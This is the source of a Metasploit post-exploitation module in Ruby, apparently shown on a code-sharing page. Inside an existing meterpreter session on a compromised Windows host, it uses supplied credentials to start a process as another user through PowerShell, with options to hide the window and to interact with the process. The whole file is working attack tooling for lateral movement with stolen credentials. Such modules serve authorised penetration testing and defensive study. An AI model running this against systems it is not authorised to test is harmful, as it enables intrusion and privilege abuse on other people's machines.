Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Powershell
8
  def initialize(info = {})
9
    super(
10
      update_info(
11
        info,
12
        'Name' => 'Windows \'Run As\' Using Powershell',
13
        'Description' => %q{ This module will start a process as another user using powershell. },
14
        'License' => MSF_LICENSE,
15
        'Author' => ['p3nt4'],
16
        'Platform' => ['win'],
17
        'SessionTypes' => ['meterpreter'],
18
        'Compat' => {
19
          'Meterpreter' => {
20
            'Commands' => %w[
21
              stdapi_sys_process_execute
22
            ]
23
          }
24
        }
25
      )
26
    )
27
    register_options(
28
      [
29
        OptString.new('USER', [true, 'User to run executable as', nil]),
30
        OptString.new('PASS', [true, 'Password of user', nil]),
31
        OptString.new('DOMAIN', [false, 'Domain of user', '']),
32
        OptString.new('EXE', [true, 'Executable to run', 'cmd.exe']),
33
        OptString.new('ARGS', [false, 'Arguments', nil]),
34
        OptString.new('PATH', [true, 'Working Directory', 'C:\\']),
35
        OptBool.new('CHANNELIZE', [true, 'Chanelize output, required for reading output or interracting', true]),
36
        OptBool.new('INTERACTIVE', [true, 'Run interactively', true]),
37
        OptBool.new('HIDDEN', [true, 'Hide the window', true])
38
      ]
39
    )
40
  end
41

42
  def run
43
    raise 'Powershell is required' if !have_powershell?
44

45
    # Variable Setup
46
    user = datastore['user']
47
    pass = datastore['pass']
48
    domain = datastore['domain']
49
    exe = datastore['exe'].gsub('\\', '\\\\\\\\')
50
    inter = datastore['interactive']
51
    args = datastore['args']
52
    path = datastore['path'].gsub('\\', '\\\\\\\\')
53
    channelized = datastore['channelize']
54
    hidden = datastore['hidden']
55
    if user.include? '\\'
56
      domain = user.split('\\')[0]
57
      user = user.split('\\')[1]
58
    end
59
    # Check if session is interactive
60
    if !session.interacting && inter
61
      print_error('Interactive mode can only be used in a meterpreter console')
62
      print_error("Use 'run post/windows/manage/run_as_psh USER=x PASS=X EXE=X' or 'SET INTERACTIVE false'")
63
      raise 'Invalide console'
64
    end
65
    # Prepare powershell script
66
    scr = "$pw = convertto-securestring '#{pass}' -asplaintext -force; "
67
    scr << "$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist '#{domain}\\#{user}',$pw; "
68
    scr << "Start-process '#{exe}' -WorkingDirectory '#{path}' -Credential $pp"
69
    if args && args != ''
70
      scr << " -argumentlist '#{args}' "
71
    end
72
    if hidden
73
      print_status('Hidden mode may not work on older powershell versions, if it fails, try HIDDEN=false')
74
      scr << ' -WindowStyle hidden'
75
    end
76
    scr = " -c \"#{scr}\""
77
    # Execute script
78
    p = client.sys.process.execute('powershell.exe', scr,
79
                                   'Channelized' => channelized,
80
                                   'Desktop' => false,
81
                                   'Session' => false,
82
                                   'Hidden' => true,
83
                                   'Interactive' => inter,
84
                                   'InMemory' => false,
85
                                   'UseThreadToken' => false)
86
    print_status("Process #{p.pid} created.")
87
    print_status("Channel #{p.channel.cid} created.") if p.channel
88
    # Process output
89
    if inter && p.channel
90
      client.console.interact_with_channel(p.channel)
91
    elsif p.channel
92
      data = p.channel.read
93
      print_line(data) if data
94
    end
95
  end
96
end
97

98